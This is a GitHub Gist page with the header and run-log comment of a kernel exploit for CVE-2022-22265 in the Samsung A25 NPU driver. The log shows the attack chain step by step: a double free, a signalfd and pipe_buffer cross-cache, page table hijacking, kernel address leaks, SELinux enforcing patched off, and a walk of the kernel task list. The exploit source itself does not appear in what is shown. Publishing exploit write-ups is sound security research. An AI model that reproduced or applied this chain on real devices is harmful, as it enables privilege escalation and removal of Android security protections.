-
-
Save bb33bb/525aa1e60a58006ee91ca7790e3ed1b8 to your computer and use it in GitHub Desktop.
CVE-2022-22265 Samsung A25 npu driver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * | |
| * Author: @javierprtd | |
| * Date : 01-08-2024 | |
| * Kernel: 5.10.177 | |
| * Samsung A25 NPU: CVE-2022-22265 (bug patched - reintroduced) | |
| * | |
| */ | |
| // echo 1 > /sys/module/memlogger/holders/npu/drivers/platform:exynos-npu/npu_exynos/npu_err_in_dmesg | |
| /* | |
| a25x:/ $ /data/local/tmp/exp | |
| [+] CVE-2022-22265 | |
| [+] mmap pages to phys r/w | |
| [+] set num files | |
| [+] preparing pipe buffer | |
| [+] alloc dmabuf | |
| [+] mmap buffer to ncp object | |
| [+] open /dev/vertex10 | |
| [+] ioctl graph | |
| [+] ioctl format | |
| [+] ioctl graph | |
| [+] init signalfd spray to better cross cache | |
| [+] start signalfd cross cache | |
| [+] ioctl format | |
| [+] getting vulnerable object (from signalfd) | |
| [+] ioctl graph | |
| [+] ioctl format | |
| [+] ioctl streamon | |
| [+] ioctl streamoff (double free) | |
| [+] spray pipe_buffer | |
| [+] locating vulnerable signalfd object (uaf) | |
| [+] pipe_buffer->page leak: 0xffffffff0134c800 | |
| [+] pipe_buffer->page to virt: 0xffffff804d320000 | |
| [+] pipe_buffer->page to virt to page: 0xffffffff0134c800 | |
| [+] fd_signal found at 31240th | |
| [+] locating vulnerable object pipe_buffer (for cross cache) | |
| [+] pipe fd found at 2th | |
| [+] free vulnerable object (from pipe_buffer) | |
| [+] finishing cross cache | |
| [+] spray page table | |
| [+] phys leak 0x00e80008e8a92f43 | |
| [+] mmap buffer to manage tlb | |
| [+] looking for page table and phys pte | |
| [+] found distinct page at virtual 0x2b0000 | |
| [!] be patient now, looking for page table | |
| [+] found page table at phys 0x00e80008edc7bf43 and phys valid buffer pte 0x00e80008ac4acf43 | |
| [+] looking for victim to migrate | |
| [+] found victim to migrate at virtual buffer full_tlb 0x7938800000 | |
| [+] page table self pointer | |
| [+] munmap evil | |
| [+] looking for victim page | |
| [+] found victim page at virtual buffer full_tlb 0x7938801000 | |
| [+] looking for kernel phys | |
| [+] kernel phys base at 0x80098000 | |
| [+] kernel phys offset 0x98000 | |
| [+] kernel phys data at 0x81e78000 | |
| [+] kernel virtual selinux_state at 0xffffffc00a262968 | |
| [+] kernel virtual init_task at 0xffffffc009e95e80 | |
| [+] kernel virtual base at 0xffffffc008098000 | |
| [+] go with selinux bypass | |
| [+] selinux enforcing patched | |
| [+] libbase.so mapped at 0x7931ff5000 | |
| [+] LogLine found at 0x7932019818 | |
| [+] looking for process | |
| ffffff881569a500 -> init | |
| ffffff8815698000 -> kthreadd | |
| ffffff881569ca00 -> rcu_gp | |
| ffffff881569dc80 -> rcu_par_gp | |
| ffffff881569b780 -> kworker/0:0 | |
| ffffff8815699280 -> kworker/0:0H | |
| ffffff88156fdc80 -> kworker/u16:0 | |
| ffffff88156fb780 -> mm_percpu_wq | |
| ffffff88156f9280 -> kworker/u16:1 | |
| ffffff88156fa500 -> rcu_tasks_kthre | |
| ffffff88156f8000 -> rcu_tasks_trace | |
| ffffff88156fca00 -> ksoftirqd/0 | |
| ffffff8815741280 -> rcu_preempt | |
| ffffff8815742500 -> rcub/0 | |
| ffffff8815740000 -> rcuc/0 | |
| ffffff8815744a00 -> migration/0 | |
| ffffff8815752500 -> cpuhp/0 | |
| ffffff881579a500 -> cpuhp/1 | |
| ffffff8815798000 -> migration/1 | |
| ffffff881579ca00 -> rcuc/1 | |
| ffffff881579dc80 -> ksoftirqd/1 | |
| ffffff881579b780 -> kworker/1:0 | |
| ffffff8815799280 -> kworker/1:0H | |
| ffffff8815d24a00 -> cpuhp/2 | |
| ffffff8815d25c80 -> migration/2 | |
| ffffff8815d23780 -> rcuc/2 | |
| ffffff8815d21280 -> ksoftirqd/2 | |
| ffffff8815d22500 -> kworker/2:0 | |
| ffffff8815d20000 -> kworker/2:0H | |
| ffffff8815ee9280 -> cpuhp/3 | |
| ffffff8815eea500 -> migration/3 | |
| ffffff8815ee8000 -> rcuc/3 | |
| ffffff8815eeca00 -> ksoftirqd/3 | |
| ffffff8815eedc80 -> kworker/3:0 | |
| ffffff8815eeb780 -> kworker/3:0H | |
| ffffff8816069280 -> cpuhp/4 | |
| ffffff881606a500 -> migration/4 | |
| ffffff8816068000 -> rcuc/4 | |
| ffffff881606ca00 -> ksoftirqd/4 | |
| ffffff881606dc80 -> kworker/4:0 | |
| ffffff881606b780 -> kworker/4:0H | |
| ffffff88161f9280 -> cpuhp/5 | |
| ffffff88161fa500 -> migration/5 | |
| ffffff88161f8000 -> rcuc/5 | |
| ffffff88161fca00 -> ksoftirqd/5 | |
| ffffff88161fdc80 -> kworker/5:0 | |
| ffffff88161fb780 -> kworker/5:0H | |
| ffffff88163b9280 -> cpuhp/6 | |
| ffffff88163ba500 -> migration/6 | |
| ffffff88163b8000 -> rcuc/6 | |
| ffffff88163bca00 -> ksoftirqd/6 | |
| ffffff88163bdc80 -> kworker/6:0 | |
| ffffff88163bb780 -> kworker/6:0H | |
| ffffff8816540000 -> cpuhp/7 | |
| ffffff8816544a00 -> migration/7 | |
| ffffff8816545c80 -> rcuc/7 | |
| ffffff8816543780 -> ksoftirqd/7 | |
| ffffff8816541280 -> kworker/7:0 | |
| ffffff8816542500 -> kworker/7:0H | |
| ffffff8816da1280 -> netns | |
| ffffff8816ef4a00 -> kworker/6:1 | |
| ffffff8816ef5c80 -> kworker/0:1 | |
| ffffff8816ef3780 -> kworker/7:1 | |
| ffffff8816ef1280 -> kworker/1:1 | |
| ffffff8816ef2500 -> kworker/2:1 | |
| ffffff8816ef0000 -> kworker/3:1 | |
| ffffff8817005c80 -> kworker/4:1 | |
| ffffff8817003780 -> kworker/5:1 | |
| ffffff8817001280 -> kauditd | |
| ffffff8817002500 -> khungtaskd | |
| ffffff8817000000 -> oom_reaper | |
| ffffff8817004a00 -> writeback | |
| ffffff88172eca00 -> kcompactd0 | |
| ffffff88173eca00 -> kblockd | |
| ffffff88173edc80 -> blkcg_punt_bio | |
| ffffff881744dc80 -> edac-poller | |
| ffffff881744b780 -> devfreq_wq | |
| ffffff8817449280 -> watchdogd | |
| ffffff881744a500 -> kworker/7:1H | |
| ffffff881739dc80 -> kswapd0 | |
| ffffff881739ca00 -> kworker/u17:0 | |
| ffffff8817390000 -> erofs_worker/0 | |
| ffffff8817392500 -> erofs_worker/1 | |
| ffffff8817391280 -> erofs_worker/2 | |
| ffffff8817393780 -> erofs_worker/3 | |
| ffffff8817395c80 -> erofs_worker/4 | |
| ffffff8817394a00 -> erofs_worker/5 | |
| ffffff8817348000 -> erofs_worker/6 | |
| ffffff881734a500 -> erofs_worker/7 | |
| ffffff8817349280 -> kworker/6:1H | |
| ffffff881734dc80 -> dmabuf-deferred | |
| ffffff881734ca00 -> uas | |
| ffffff88172edc80 -> uether | |
| ffffff8816da2500 -> dm_bufio_cache | |
| ffffff8816da0000 -> ipv6_addrconf | |
| ffffff8816da4a00 -> five_wq | |
| ffffff8816da5c80 -> five_hook_wq | |
| ffffff881c509280 -> kworker/7:2 | |
| ffffff881c50b780 -> kworker/6:2 | |
| ffffff88172f0000 -> kworker/u16:2 | |
| ffffff88172f4a00 -> acpm_update_log | |
| ffffff88172f2500 -> irq/107-1190000 | |
| ffffff88172f3780 -> kworker/7:3 | |
| ffffff88172f1280 -> irq/151-s2mpu | |
| ffffff88172f5c80 -> irq/152-s2mpu | |
| ffffff881d144a00 -> irq/153-s2mpu | |
| ffffff881d145c80 -> irq/154-s2mpu | |
| ffffff881d143780 -> irq/155-s2mpu | |
| ffffff881d141280 -> irq/156-s2mpu | |
| ffffff881d142500 -> irq/157-s2mpu | |
| ffffff881d140000 -> irq/158-s2mpu | |
| ffffff881d14b780 -> irq/159-s2mpu | |
| ffffff881d149280 -> irq/160-s2mpu | |
| ffffff881d14a500 -> irq/161-s2mpu | |
| ffffff881d148000 -> irq/162-s2mpu | |
| ffffff881d14ca00 -> irq/163-s2mpu | |
| ffffff881d14dc80 -> irq/164-s2mpu | |
| ffffff881d198000 -> irq/165-s2mpu | |
| ffffff881d19ca00 -> irq/166-s2mpu | |
| ffffff881d19dc80 -> irq/167-s2mpu | |
| ffffff881d19b780 -> irq/168-s2mpu | |
| ffffff881d199280 -> irq/169-s2mpu | |
| ffffff881d19a500 -> irq/170-s2mpu | |
| ffffff881d1e1280 -> irq/171-s2mpu | |
| ffffff881d1e2500 -> irq/172-s2mpu | |
| ffffff881d1e0000 -> irq/173-s2mpu | |
| ffffff881d1e4a00 -> irq/174-exynos- | |
| ffffff881d1e5c80 -> irq/123-118c000 | |
| ffffff881e885c80 -> sec_audio_dbg_s | |
| ffffff881e883780 -> sec_abc_wq | |
| ffffff881e881280 -> typec_manager_e | |
| ffffff881e884a00 -> typec_manager_m | |
| ffffff881c51dc80 -> irq/292-1171000 | |
| ffffff881c51ca00 -> irq/293-1171000 | |
| ffffff881c518000 -> irq/294-1171000 | |
| ffffff881c51b780 -> irq/295-1171000 | |
| ffffff881c519280 -> irq/296-1171000 | |
| ffffff881c51a500 -> irq/297-1171000 | |
| ffffff881d1e3780 -> irq/298-1171000 | |
| ffffff88173e4a00 -> irq/299-1171000 | |
| ffffff88173e5c80 -> irq/300-1171000 | |
| ffffff88173eb780 -> irq/301-1171000 | |
| ffffff88173e9280 -> fast_switch_pos | |
| ffffff88173ea500 -> fast_switch_pos | |
| ffffff88173e8000 -> thermal_BIG | |
| ffffff8816da3780 -> thermal_hotplug | |
| ffffff881f6f5c80 -> thermal_LITTLE | |
| ffffff881f6f3780 -> thermal_G3D | |
| ffffff881f6f1280 -> thermal_ISP | |
| ffffff881f6f2500 -> thermal_NPU | |
| ffffff881f6f0000 -> thermal_CP | |
| ffffff881f6f4a00 -> fast_switch:0 | |
| ffffff881f74a500 -> fast_switch:6 | |
| ffffff881f748000 -> kworker/6:3 | |
| ffffff881f74ca00 -> g3d_dvfs | |
| ffffff881f74dc80 -> kbase_job_fault | |
| ffffff881f74b780 -> kworker/u17:1 | |
| ffffff881f749280 -> simpleinteracti | |
| ffffff881f730000 -> simpleinteracti | |
| ffffff881f734a00 -> simpleinteracti | |
| ffffff881f735c80 -> simpleinteracti | |
| ffffff881f733780 -> simpleinteracti | |
| ffffff881f731280 -> simpleinteracti | |
| ffffff881f732500 -> simpleinteracti | |
| ffffff881f72ca00 -> simpleinteracti | |
| ffffff881f72dc80 -> cpif_tpmon_moni | |
| ffffff881f72b780 -> cpif_tpmon_boos | |
| ffffff881f729280 -> shmem_tx_wq | |
| ffffff881f72a500 -> irq/177-tzasc | |
| ffffff881f728000 -> irq/178-tzasc | |
| ffffff88205a8000 -> irq/179-ppmpu | |
| ffffff88205aca00 -> irq/180-ppmpu | |
| ffffff88205adc80 -> hwrng | |
| ffffff88205ab780 -> irq/62-14c50000 | |
| ffffff88205a9280 -> irq/63-14c50000 | |
| ffffff88205aa500 -> irq/64-15110000 | |
| ffffff88207d2500 -> irq/65-15110000 | |
| ffffff88207d0000 -> abox_ipc | |
| ffffff88207d4a00 -> irq/66-15140000 | |
| ffffff88207d5c80 -> irq/67-15140000 | |
| ffffff88207d3780 -> irq/68-15170000 | |
| ffffff88207d1280 -> irq/69-15170000 | |
| ffffff8814c7a500 -> irq/70-151a0000 | |
| ffffff8814c78000 -> irq/71-151a0000 | |
| ffffff8814c7ca00 -> irq/72-15580000 | |
| ffffff8814c7dc80 -> irq/73-15580000 | |
| ffffff8814c7b780 -> irq/74-15480000 | |
| ffffff8814c79280 -> irq/75-15480000 | |
| ffffff8814ca9280 -> irq/76-153a0000 | |
| ffffff8814caa500 -> abox_qos | |
| ffffff8814ca8000 -> irq/77-153a0000 | |
| ffffff8814caca00 -> kworker/5:2 | |
| ffffff8814cadc80 -> irq/78-153d0000 | |
| ffffff8814cab780 -> irq/79-153d0000 | |
| ffffff8814d2dc80 -> irq/80-12cd0000 | |
| ffffff8814d2b780 -> irq/81-12cd0000 | |
| ffffff8814d29280 -> irq/82-10b50000 | |
| ffffff8814d2a500 -> irq/83-10b50000 | |
| ffffff8814d28000 -> irq/84-10b80000 | |
| ffffff8814d2ca00 -> irq/85-10b80000 | |
| ffffff8814d78000 -> irq/86-14900000 | |
| ffffff8814d7ca00 -> irq/87-14900000 | |
| ffffff8814d7dc80 -> irq/88-149d0000 | |
| ffffff8814d7b780 -> irq/89-149d0000 | |
| ffffff8814d79280 -> irq/90-15680000 | |
| ffffff8814d7a500 -> irq/91-15680000 | |
| ffffff8814e50000 -> irq/92-156b0000 | |
| ffffff8814e54a00 -> irq/93-156b0000 | |
| ffffff8814e55c80 -> kworker/4:2 | |
| ffffff8814e53780 -> irq/94-12e70000 | |
| ffffff8814e51280 -> irq/95-12e70000 | |
| ffffff8814e52500 -> panel0:disp-det | |
| ffffff8814810000 -> panel0:pcd | |
| ffffff8814814a00 -> panel0:err-fg | |
| ffffff8814815c80 -> panel0:conn-det | |
| ffffff8814813780 -> panel0:panel-co | |
| ffffff8814811280 -> panel0:panel-up | |
| ffffff8814812500 -> panel0:evasion- | |
| ffffff8814869280 -> panel-bl-thread | |
| ffffff881486a500 -> abd_blank_workq | |
| ffffff8814868000 -> rbin | |
| ffffff881486ca00 -> rbin_shrink | |
| ffffff881486dc80 -> crtc0_kthread | |
| ffffff881486b780 -> crtc1_kthread | |
| ffffff88fe8fa500 -> card0-crtc0 | |
| ffffff88fe8f8000 -> card0-crtc1 | |
| ffffff88fe8fca00 -> wq_vsync | |
| ffffff88fe8fdc80 -> wq_fsync | |
| ffffff881e880000 -> kworker/2:2 | |
| ffffff881e882500 -> wq_dispon | |
| ffffff881734b780 -> wq_panel_probe | |
| ffffff881739b780 -> log_collector | |
| ffffff881739a500 -> failure_wq | |
| ffffff8817399280 -> syserr_recovery | |
| ffffff8817398000 -> fm_client_wq | |
| ffffff88fd6a8000 -> tz_worker_threa | |
| ffffff88fd6aca00 -> tz_worker_threa | |
| ffffff88fd6adc80 -> tz_worker_threa | |
| ffffff88fd6ab780 -> tz_worker_threa | |
| ffffff88fd6a9280 -> tz_worker_threa | |
| ffffff88fd6aa500 -> tz_worker_threa | |
| ffffff88fe8fb780 -> tz_worker_threa | |
| ffffff88fe8f9280 -> tz_worker_threa | |
| ffffff88fd6f5c80 -> ree_time | |
| ffffff88fd6fdc80 -> tz_iwlog_thread | |
| ffffff881c50dc80 -> tz_iwsock | |
| ffffff88fd67ca00 -> connecting_thre | |
| ffffff88fd67dc80 -> wifilogger | |
| ffffff88173e3780 -> wifilogger | |
| ffffff88173e1280 -> wifilogger | |
| ffffff881c50ca00 -> wifilogger | |
| ffffff88fd304a00 -> cfg80211 | |
| ffffff88173e2500 -> conn_logger | |
| ffffff88173e0000 -> usb_notify | |
| ffffff88fd6f3780 -> s2mpu13-wqueue@ | |
| ffffff88fd6f1280 -> irq/306-s2mpu13 | |
| ffffff88fd6f2500 -> power-keys-wq0@ | |
| ffffff88fd6f0000 -> s2mpu14-wqueue@ | |
| ffffff88fd6f4a00 -> scsi_eh_0 | |
| ffffff88fcda4a00 -> scsi_tmf_0 | |
| ffffff88fcda5c80 -> ufs_perf_0 | |
| ffffff88fcda3780 -> ufs_eh_wq_0 | |
| ffffff88fcda1280 -> ufs_clk_gating_ | |
| ffffff88fcb29280 -> usb_int_qos_wq | |
| ffffff88fcb2a500 -> usb_tpmon_wq | |
| ffffff88fcb28000 -> SEC_WB_wq | |
| ffffff88fcda2500 -> kworker/u16:3 | |
| ffffff88fd6fb780 -> kworker/0:1H | |
| ffffff88fd6f9280 -> kworker/u16:4 | |
| ffffff88fcb2dc80 -> kworker/1:1H | |
| ffffff88fd305c80 -> kworker/2:1H | |
| ffffff88fd303780 -> kworker/5:1H | |
| ffffff88fd301280 -> kworker/3:1H | |
| ffffff88fd300000 -> srpmb_wq | |
| ffffff88e5f69280 -> mfc/inst_migrat | |
| ffffff88fcb2b780 -> mfc/butler | |
| ffffff88e5ff8000 -> irq/355-12ed000 | |
| ffffff88e5ffca00 -> mfc_core/meerka | |
| ffffff88e5ffdc80 -> mfc_core/idle | |
| ffffff88e5f6a500 -> mfc_core/butler | |
| ffffff88e5f68000 -> mfc_core/qos_ct | |
| ffffff88e5f6ca00 -> irq/493-s2mf301 | |
| ffffff88e5f6dc80 -> dw-mci-card | |
| ffffff88e5f6b780 -> dw_mci_clk_ctrl | |
| ffffff8816f99280 -> kworker/6:4 | |
| ffffff8816f9a500 -> chub_log_kthrea | |
| ffffff8816f98000 -> irq/268-11a1000 | |
| ffffff8816f9ca00 -> npu_exynos | |
| ffffff8816f9dc80 -> kworker/0:2 | |
| ffffff88e5ffb780 -> 3-003c | |
| ffffff88fd67b780 -> pdic_irq_event | |
| ffffff88fd679280 -> 3-003c | |
| ffffff88fd67a500 -> irq/495-s2mf301 | |
| ffffff88fd678000 -> kworker/1:2 | |
| ffffff88358aa500 -> fingerprint_deb | |
| ffffff88358a8000 -> bootc_wq | |
| ffffff88358aca00 -> samsung_mobile_ | |
| ffffff88e5ff9280 -> kworker/2:3 | |
| ffffff88e5ffa500 -> charger-wq | |
| ffffff8835405c80 -> kworker/1:3 | |
| ffffff8835403780 -> kworker/1:4 | |
| ffffff8835401280 -> shub_dev_wq | |
| ffffff8835402500 -> shub_debug_wq | |
| ffffff8835400000 -> sec_vibrator | |
| ffffff8835404a00 -> sec_input_irq_w | |
| ffffff88356d2500 -> fts_wq | |
| ffffff88356d0000 -> fts_irq_wq | |
| ffffff88fcda0000 -> irq/496-focalte | |
| ffffff883572b780 -> irq/497-A96T3X6 | |
| ffffff8835729280 -> kworker/2:4 | |
| ffffff8816f9b780 -> pass-through | |
| ffffff883505b780 -> irq/499-tfa98xx | |
| ffffff8835059280 -> irq/500-tfa98xx | |
| ffffff883505a500 -> jbd2/sda26-8 | |
| ffffff8835058000 -> ext4-rsv-conver | |
| ffffff88356d4a00 -> kdmflush | |
| ffffff88356d5c80 -> kdmflush | |
| ffffff88358adc80 -> kdmflush | |
| ffffff88358ab780 -> kdmflush | |
| ffffff88358a9280 -> kdmflush | |
| ffffff8835223780 -> kdmflush | |
| ffffff8835221280 -> kverityd | |
| ffffff883505ca00 -> kdmflush | |
| ffffff8835222500 -> kverityd | |
| ffffff8835220000 -> kdmflush | |
| ffffff8835224a00 -> kverityd | |
| ffffff8835225c80 -> kdmflush | |
| ffffff8834ce2500 -> kverityd | |
| ffffff8834ce0000 -> kdmflush | |
| ffffff8834ce4a00 -> kverityd | |
| ffffff8834ce5c80 -> kdmflush | |
| ffffff8834ce3780 -> kverityd | |
| ffffff8834ce1280 -> ext4-rsv-conver | |
| ffffff8834f42500 -> kdmflush | |
| ffffff8834f40000 -> kverityd | |
| ffffff8834f44a00 -> ext4-rsv-conver | |
| ffffff88172e9280 -> init | |
| ffffff88172e8000 -> ueventd | |
| ffffff8834f41280 -> kworker/4:1H | |
| ffffff88334edc80 -> kdmflush | |
| ffffff88334eb780 -> kdmflush | |
| ffffff88334e9280 -> kdmflush | |
| ffffff883350ca00 -> kdmflush | |
| ffffff883350dc80 -> kdmflush | |
| ffffff883350b780 -> kdmflush | |
| ffffff8833509280 -> kdmflush | |
| ffffff883350a500 -> kdmflush | |
| ffffff8833508000 -> kdmflush | |
| ffffff883356b780 -> kdmflush | |
| ffffff8833569280 -> kdmflush | |
| ffffff883356a500 -> kdmflush | |
| ffffff8833568000 -> kdmflush | |
| ffffff88335d9280 -> kdmflush | |
| ffffff88335dca00 -> kdmflush | |
| ffffff88335ddc80 -> kdmflush | |
| ffffff8833641280 -> kdmflush | |
| ffffff8833640000 -> kdmflush | |
| ffffff8833644a00 -> kdmflush | |
| ffffff88336b8000 -> kdmflush | |
| ffffff88336bb780 -> kdmflush | |
| ffffff88336b9280 -> kdmflush | |
| ffffff883373a500 -> loop0 | |
| ffffff8833738000 -> loop1 | |
| ffffff883373ca00 -> loop2 | |
| ffffff881c508000 -> loop3 | |
| ffffff883505dc80 -> loop4 | |
| ffffff88331e5c80 -> ext4-rsv-conver | |
| ffffff88331e3780 -> ext4-rsv-conver | |
| ffffff88331e2500 -> ext4-rsv-conver | |
| ffffff88356d1280 -> ext4-rsv-conver | |
| ffffff88328f4a00 -> ext4-rsv-conver | |
| ffffff88328f3780 -> kworker/0:3 | |
| ffffff88328f1280 -> init | |
| ffffff883373dc80 -> tfa98xx | |
| ffffff881ab38000 -> tfacal | |
| ffffff88351db780 -> prng_seeder | |
| ffffff883371a500 -> tfa98xx | |
| ffffff883572a500 -> tfacal | |
| ffffff8834f45c80 -> kworker/1:5 | |
| ffffff8835728000 -> logd | |
| ffffff88fd6f8000 -> lmkd | |
| ffffff88351d9280 -> servicemanager | |
| ffffff8834f43780 -> hwservicemanage | |
| ffffff881a251280 -> vndservicemanag | |
| ffffff883572ca00 -> psimon | |
| ffffff88f1ec8000 -> watchdogd | |
| ffffff88351da500 -> binder:566_2 | |
| ffffff881a254a00 -> jbd2/sda34-8 | |
| ffffff881a255c80 -> ext4-rsv-conver | |
| ffffff881733a500 -> jbd2/sda1-8 | |
| ffffff881733dc80 -> ext4-rsv-conver | |
| ffffff8833719280 -> kdmflush | |
| ffffff8817339280 -> jbd2/sda33-8 | |
| ffffff881733b780 -> ext4-rsv-conver | |
| ffffff881733ca00 -> jbd2/sda2-8 | |
| ffffff8817338000 -> ext4-rsv-conver | |
| ffffff88edf68000 -> irq/498-rt5665 | |
| ffffff88edf6ca00 -> iod | |
| ffffff88edf6b780 -> tzdaemon | |
| ffffff88328f0000 -> tzts_daemon | |
| ffffff88f1ec9280 -> suspend-service | |
| ffffff88e6bb3780 -> binder:606_2 | |
| ffffff88f1cf9280 -> android.hardwar | |
| ffffff88f1ecb780 -> vendor.samsung. | |
| ffffff88f1ecdc80 -> vendor.samsung. | |
| ffffff88328f2500 -> vendor.samsung. | |
| ffffff88e6bb1280 -> vendor.samsung. | |
| ffffff88147ab780 -> f2fs_ckpt-254:5 | |
| ffffff88147a9280 -> f2fs_discard-25 | |
| ffffff881441b780 -> f2fs_gc-254:53 | |
| ffffff8814738000 -> vendor.samsung. | |
| ffffff88146ab780 -> vaultkeeperd | |
| ffffff88e6bb5c80 -> tombstoned | |
| ffffff8814523780 -> loop5 | |
| ffffff8814418000 -> loop6 | |
| ffffff8814521280 -> loop7 | |
| ffffff88146adc80 -> loop8 | |
| ffffff88146a9280 -> loop9 | |
| ffffff88147aca00 -> loop10 | |
| ffffff88e6bb2500 -> loop11 | |
| ffffff881473ca00 -> loop12 | |
| ffffff883c59dc80 -> loop13 | |
| ffffff883c59b780 -> loop14 | |
| ffffff88147adc80 -> loop15 | |
| ffffff883c599280 -> loop16 | |
| ffffff883c59a500 -> loop17 | |
| ffffff881441dc80 -> loop18 | |
| ffffff883c598000 -> loop19 | |
| ffffff883c59ca00 -> loop20 | |
| ffffff883cad1280 -> loop21 | |
| ffffff88146aa500 -> loop22 | |
| ffffff883cad2500 -> loop23 | |
| ffffff881473dc80 -> loop24 | |
| ffffff881473b780 -> kverityd | |
| ffffff8814739280 -> loop25 | |
| ffffff883cac4a00 -> ext4-rsv-conver | |
| ffffff88147a8000 -> ext4-rsv-conver | |
| ffffff881473a500 -> loop26 | |
| ffffff88146a8000 -> loop27 | |
| ffffff881ab3b780 -> ext4-rsv-conver | |
| ffffff881ab39280 -> loop28 | |
| ffffff883cac5c80 -> ext4-rsv-conver | |
| ffffff88146aca00 -> loop29 | |
| ffffff8814524a00 -> ext4-rsv-conver | |
| ffffff883cc43780 -> ext4-rsv-conver | |
| ffffff88f1ecca00 -> loop30 | |
| ffffff883cc9b780 -> ext4-rsv-conver | |
| ffffff883cad0000 -> ext4-rsv-conver | |
| ffffff883cad4a00 -> ext4-rsv-conver | |
| ffffff883cc99280 -> loop31 | |
| ffffff883cc9a500 -> ext4-rsv-conver | |
| ffffff883cc41280 -> ext4-rsv-conver | |
| ffffff883cc42500 -> ext4-rsv-conver | |
| ffffff883cc40000 -> ext4-rsv-conver | |
| ffffff883cc98000 -> ext4-rsv-conver | |
| ffffff883cc9ca00 -> kverityd | |
| ffffff883cc9dc80 -> kverityd | |
| ffffff883cad5c80 -> loop32 | |
| ffffff883ccfb780 -> ext4-rsv-conver | |
| ffffff883ca2b780 -> ext4-rsv-conver | |
| ffffff883cad3780 -> ext4-rsv-conver | |
| ffffff883c9cb780 -> ext4-rsv-conver | |
| ffffff883c9ca500 -> ext4-rsv-conver | |
| ffffff883cc44a00 -> ext4-rsv-conver | |
| ffffff883cc90000 -> loop33 | |
| ffffff883cd6b780 -> loop34 | |
| ffffff883cc94a00 -> loop35 | |
| ffffff883c9c9280 -> loop36 | |
| ffffff883cc45c80 -> loop37 | |
| ffffff883cdc1280 -> kverityd | |
| ffffff883cd69280 -> loop38 | |
| ffffff883cdeb780 -> ext4-rsv-conver | |
| ffffff883cc95c80 -> loop39 | |
| ffffff883cc93780 -> kverityd | |
| ffffff883cc91280 -> kverityd | |
| ffffff883cc92500 -> ext4-rsv-conver | |
| ffffff883ce13780 -> loop40 | |
| ffffff883cde9280 -> ext4-rsv-conver | |
| ffffff883cdea500 -> loop41 | |
| ffffff883cde8000 -> kverityd | |
| ffffff883cdc2500 -> kverityd | |
| ffffff883ccf9280 -> kverityd | |
| ffffff881ab3a500 -> kverityd | |
| ffffff881ab3ca00 -> ext4-rsv-conver | |
| ffffff883ca6dc80 -> loop42 | |
| ffffff883cf83780 -> ext4-rsv-conver | |
| ffffff883ce11280 -> kverityd | |
| ffffff883ccfa500 -> ext4-rsv-conver | |
| ffffff883cdc0000 -> kverityd | |
| ffffff883cdc4a00 -> loop43 | |
| ffffff883cd6a500 -> ext4-rsv-conver | |
| ffffff883ce12500 -> ext4-rsv-conver | |
| ffffff883cdc5c80 -> ext4-rsv-conver | |
| ffffff883cdc3780 -> loop44 | |
| ffffff883d409280 -> ext4-rsv-conver | |
| ffffff883cdeca00 -> loop45 | |
| ffffff883ccf8000 -> kverityd | |
| ffffff883ccfca00 -> kverityd | |
| ffffff883ccfdc80 -> ext4-rsv-conver | |
| ffffff883ca2dc80 -> ext4-rsv-conver | |
| ffffff883cd68000 -> kverityd | |
| ffffff883cd6ca00 -> kverityd | |
| ffffff883cdedc80 -> kverityd | |
| ffffff883d4edc80 -> kverityd | |
| ffffff883d4eb780 -> kverityd | |
| ffffff883ca28000 -> ext4-rsv-conver | |
| ffffff883ca2a500 -> ext4-rsv-conver | |
| ffffff883cf81280 -> kverityd | |
| ffffff883cf82500 -> ext4-rsv-conver | |
| ffffff883ca2ca00 -> ext4-rsv-conver | |
| ffffff883ca29280 -> ext4-rsv-conver | |
| ffffff883ce10000 -> ext4-rsv-conver | |
| ffffff883cd6dc80 -> kverityd | |
| ffffff883d4e9280 -> kverityd | |
| ffffff883d4ea500 -> ext4-rsv-conver | |
| ffffff883d4e8000 -> ext4-rsv-conver | |
| ffffff883d705c80 -> magiskd | |
| ffffff883cac3780 -> cass | |
| ffffff883cac2500 -> emservice | |
| ffffff883d700000 -> binder:836_2 | |
| ffffff883d704a00 -> binder:837_3 | |
| ffffff883d40ca00 -> main | |
| ffffff883d40dc80 -> main | |
| ffffff883ca69280 -> [email protected] | |
| ffffff883c9d3780 -> audio.service | |
| ffffff883ca6b780 -> [email protected] | |
| ffffff883ca6ca00 -> [email protected] | |
| ffffff883ca68000 -> [email protected] | |
| ffffff883c9d2500 -> [email protected] | |
| ffffff883c9d5c80 -> [email protected] | |
| ffffff883cf85c80 -> [email protected] | |
| ffffff883ce14a00 -> iptables-restor | |
| ffffff883ca6a500 -> android.hardwar | |
| ffffff883ce15c80 -> ip6tables-resto | |
| ffffff881a86a500 -> neuralnetworks@ | |
| ffffff881a869280 -> [email protected] | |
| ffffff881a86dc80 -> [email protected] | |
| ffffff881a86b780 -> [email protected] | |
| ffffff881a868000 -> binder:859_2 | |
| ffffff881a86ca00 -> hermesd | |
| ffffff8843959280 -> vendor.samsung. | |
| ffffff883c9d4a00 -> vendor.samsung. | |
| ffffff883c9d0000 -> android.hardwar | |
| ffffff883c9d1280 -> android.hardwar | |
| ffffff88fd6fca00 -> android.hardwar | |
| ffffff88408cca00 -> samsung.hardwar | |
| ffffff883d4eca00 -> samsung.softwar | |
| ffffff883ca1ca00 -> [email protected] | |
| ffffff8845cd3780 -> [email protected] | |
| ffffff8845c18000 -> [email protected] | |
| ffffff8845cd2500 -> vendor.samsung. | |
| ffffff8845cd0000 -> [email protected] | |
| ffffff8845c1ca00 -> [email protected] | |
| ffffff8845cba500 -> vendor.samsung. | |
| ffffff8845cd4a00 -> [email protected] | |
| ffffff8845cd5c80 -> ExynosHWCServic | |
| ffffff8847ab4a00 -> [email protected] | |
| ffffff8847ab5c80 -> eden_runtime@1. | |
| ffffff8847ab3780 -> [email protected] | |
| ffffff8847ab1280 -> audioserver | |
| ffffff8847ab2500 -> credstore | |
| ffffff8847ab0000 -> binder:954_2 | |
| ffffff88478e1280 -> kumihodecoder | |
| ffffff88478e2500 -> perfmond | |
| ffffff88491c5c80 -> surfaceflinger | |
| ffffff88492d2500 -> drmserver | |
| ffffff8850202500 -> ewlogd | |
| ffffff88492d3780 -> traced_probes | |
| ffffff88491c2500 -> traced | |
| ffffff884a942500 -> kbase_event | |
| ffffff8849144a00 -> kbase_event | |
| ffffff8858a44a00 -> vendor.samsung. | |
| ffffff8847a05c80 -> binder:1044_2 | |
| ffffff88589ab780 -> fabric_crypto | |
| ffffff8847a02500 -> imsd | |
| ffffff8845fbb780 -> binder:1061_2 | |
